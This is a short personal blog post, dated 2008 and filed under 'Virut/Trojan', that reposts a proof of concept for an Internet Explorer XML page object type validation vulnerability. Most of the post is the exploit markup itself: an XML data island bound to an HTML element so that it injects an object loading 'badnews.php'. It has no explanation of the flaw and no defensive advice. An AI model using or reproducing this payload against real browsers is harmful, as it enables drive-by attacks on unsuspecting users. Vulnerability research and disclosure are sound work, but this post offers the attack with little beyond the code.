► ๖ۣۜLINH ๖ۣۜOLIVER ◄

My Blog

Scroll down to discover

Search

[malware]Microsoft Internet Explorer XML Page Object Type Validation Vulnerability

June 21, 2008Category : Virut/Trojan

The following proof of concept has been supplied:

<span datasrc=”#oExec” datafld=”exploit” dataformatas=”html”></span>
<xml id=”oExec”>
<security>
<exploit>
<![CDATA[
<object id=”oFile” data=”badnews.php”></object>
]]>
</exploit>
</security>
</xml>

Leave a Reply

Prev - [malware]Microsoft Internet Explorer Shell.Application Object Script Execution Weakness
Next - [malware]Microsoft Internet Explorer Self Executing HTML File Vulnerability

01.

Please Enable JavaScript in your Browser to Visit this Site.

#mdp-ungrabber-js-disabled { position: fixed; top: 0; left: 0; height: 100%; width: 100%; z-index: 999999; text-align: center; background-color: #FFFFFF; color: #000000; font-size: 40px; display: flex; align-items: center; justify-content: center; }